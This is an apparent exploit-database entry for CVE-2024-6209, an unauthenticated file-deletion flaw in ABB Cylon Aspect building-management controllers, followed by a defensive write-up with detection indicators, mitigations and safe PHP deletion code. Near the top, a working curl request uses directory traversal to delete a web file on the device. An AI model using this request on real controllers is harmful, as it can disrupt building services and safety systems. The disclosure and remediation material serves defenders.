ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
# Exploit Title : ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The BMS/BAS controller suffers from an arbitrary file deletion vulnerability.
Input passed to the 'file' parameter in 'databasefiledelete.php' is not properly
sanitised before being used to delete files. This can be exploited by an unauthenticated
attacker to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5827
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5827.php
CVE ID: CVE-2024-6209
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6209
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -X POST http://192.168.73.31/databaseFileDelete.php \
> -d "file0=../../../../../../../../../home/MIX_CMIX/htmlroot/validate/validateHeader.php \
> &delete0=1 \
> &total=1 \
> &submitDeleteForm=Delete"
<META HTTP-EQUIV='Refresh' content='0;URL=databaseFile.php'>ABB Cylon Aspect 3.08.01 — Arbitrary File Deletion Vulnerability (CVE-2024-6209)
Overview
ABB Cylon Aspect is a building energy management and control platform used in many commercial installations. A vulnerability identified in firmware versions up to and including 3.08.01 allows an unauthenticated remote attacker to trigger deletion of files accessible to the web server process. The issue was tracked as CVE-2024-6209 and disclosed by security researchers with vendor advisories following responsible disclosure.
What the vulnerability is (high level)
At its core the flaw is a path-handling and access-control weakness: user-supplied input that indicates a file to delete is not correctly validated or canonicalized before the server performs file-system deletion. This enables directory traversal style inputs to reference and remove files outside the intended directory scope.
Why this is serious
- Unauthenticated: attackers do not need valid credentials to attempt deletions.
- Privileges: deletions occur with the permissions of the web server process, which may include sensitive configuration or runtime files.
- Availability and safety: in building management systems, deleting configuration, scripts or service files can disrupt HVAC, lighting, or other building services with operational and safety implications.
Affected products and references
Reportedly affected components include multiple ASPECT and NEXUS series controllers and management software builds where firmware/software is at or below 3.08.01. See the official advisory for authoritative scope, patches and vendor guidance.
- CVE: CVE-2024-6209
- Vendor advisory and disclosure: consult ABB/authorized channels and the original research advisory for timelines and patch references.
Technical root cause (developer view)
The root cause is inadequate validation and canonicalization of a filename/path taken from client input before a file-system operation (delete) is executed. Typical safe approaches were not applied: inputs were not normalized to an absolute path, not checked against a whitelist or confined to a specific base directory, and symlink/permission considerations were not enforced.
Detection and indicators
Monitoring and detection can help identify attempts or successful exploitation:
- Web server access logs showing POST or other requests to file-management endpoints from unusual sources or times.
- Unexpected 200/204 responses to deletion requests followed by missing files or degraded application behavior.
- File system audit logs showing file removal operations initiated by the web server process.
- Integrity monitoring alerts for modified/missing configuration or executable files (tripwire, AIDE).
Immediate mitigations (operational)
- Restrict network exposure: limit access to web management interfaces by IP allowlists, VPN-only access, or isolating management interfaces from the public internet.
- Harden access: require authentication and multi-factor authentication for management interfaces where possible.
- Apply vendor patches: prioritize firmware/software updates from ABB that remediate the issue.
- Compensating controls: implement WAF rules or proxy filters to block suspicious file-management requests as a temporary measure.
- Backups: ensure recent backups exist so deleted files can be restored quickly if needed.
Secure coding fixes (recommended)
Fixes should remove the assumption that user input is safe. The following defensive patterns are recommended for any server-side file operation:
- Canonicalize and normalize paths with realpath or equivalent and verify the resolved path is inside an expected base directory.
- Prefer a whitelist of filenames or identifiers mapped to safe internal paths (avoid accepting raw paths from clients).
- Disallow path-separator characters in client-supplied identifiers when possible; treat client input as opaque IDs.
- Run the web server as a minimally privileged user and restrict file permissions so the process cannot delete sensitive files.
- Maintain detailed audit logging whenever a delete operation is performed and require authorization checks.
Example: safe file-delete pattern in PHP (defensive)
<?php
// Base directory that contains allowed files
$baseDir = '/var/www/aspect/files';
// Get the client-supplied identifier (not a raw path)
$fileId = $_POST['fileId'] ?? '';
// Map identifiers to safe filenames (preferred)
$whitelist = [
'template-a' => 'template-a.html',
'template-b' => 'template-b.html',
];
// Resolve using whitelist mapping
if (!isset($whitelist[$fileId])) {
http_response_code(400);
echo 'Invalid file identifier';
exit;
}
$target = $baseDir . DIRECTORY_SEPARATOR . $whitelist[$fileId];
// Canonicalize and verify the resolved path is within baseDir
$realTarget = realpath($target);
$realBase = realpath($baseDir);
if ($realTarget === false || strpos($realTarget, $realBase) !== 0 || !is_file($realTarget)) {
http_response_code(404);
echo 'File not found';
exit;
}
// Perform deletion with logging and authorization check
// (Assume authorization check has already succeeded)
if (!unlink($realTarget)) {
http_response_code(500);
echo 'Unable to delete file';
} else {
// Log the deletion for auditing
error_log('File deleted: ' . $realTarget . ' by ' . $_SERVER['REMOTE_ADDR']);
echo 'Deleted';
}
?>
Explanation: This snippet demonstrates a defensive approach by mapping client-supplied identifiers to an internal whitelist of filenames, canonicalizing paths with realpath, ensuring the resolved path is inside the intended base directory, and performing the deletion only after these checks succeed. It also logs activity to support audit and incident response.
Alternative: canonicalization check (if mapping is not possible)
<?php
$baseDir = '/var/www/aspect/files';
$requested = $_POST['path'] ?? '';
// Build path relative to base and canonicalize
$combined = $baseDir . DIRECTORY_SEPARATOR . $requested;
$realCombined = realpath($combined);
$realBase = realpath($baseDir);
if ($realCombined === false || strpos($realCombined, $realBase) !== 0) {
http_response_code(400);
echo 'Invalid path';
exit;
}
// Additional checks: ensure not a directory, avoid following symlinks, etc.
if (!is_file($realCombined) || is_link($realCombined)) {
http_response_code(400);
echo 'Invalid file';
exit;
}
unlink($realCombined);
echo 'Deleted';
?>
Explanation: This pattern shows canonicalization using realpath and then comparing the resolved path to the base directory to prevent traversal outside the intended directory. It also checks that the target is a regular file and not a symlink. While safer than accepting raw input, prefer an ID-to-filename mapping when practical.
Long-term recommendations for vendors and operators
- Perform secure code reviews focusing on file-system APIs and input handling.
- Introduce automated fuzzing and static analysis specifically targeting path-handling routines.
- Harden defaults: minimize web server privileges, lock down management interfaces, and provide clear guidance for network segmentation.
- Provide signed, verifiable firmware updates and clear patch timelines to customers.
Incident response checklist (if exploitation is suspected)
- Isolate affected device(s) from the network to prevent further manipulation.
- Collect and preserve logs (web server, system audit, application logs) for forensic analysis.
- Restore missing files from verified backups and validate integrity before returning to production.
- Apply vendor patches and change any administrative credentials used by management interfaces.
- Review related devices for similar exposures and search logs for suspicious activity patterns.
Conclusion
The file-deletion vulnerability in ABB Cylon Aspect prior to 3.08.02 demonstrates a very common and impactful class of web-application errors: improper handling of client-controlled file paths. Immediate mitigation includes network restrictions, applying vendor patches and backups; long-term mitigation requires defensive coding patterns such as canonicalization, whitelist mapping, least privilege, and logging. Operators of building management systems should treat management interfaces as sensitive infrastructure and apply layered protections accordingly.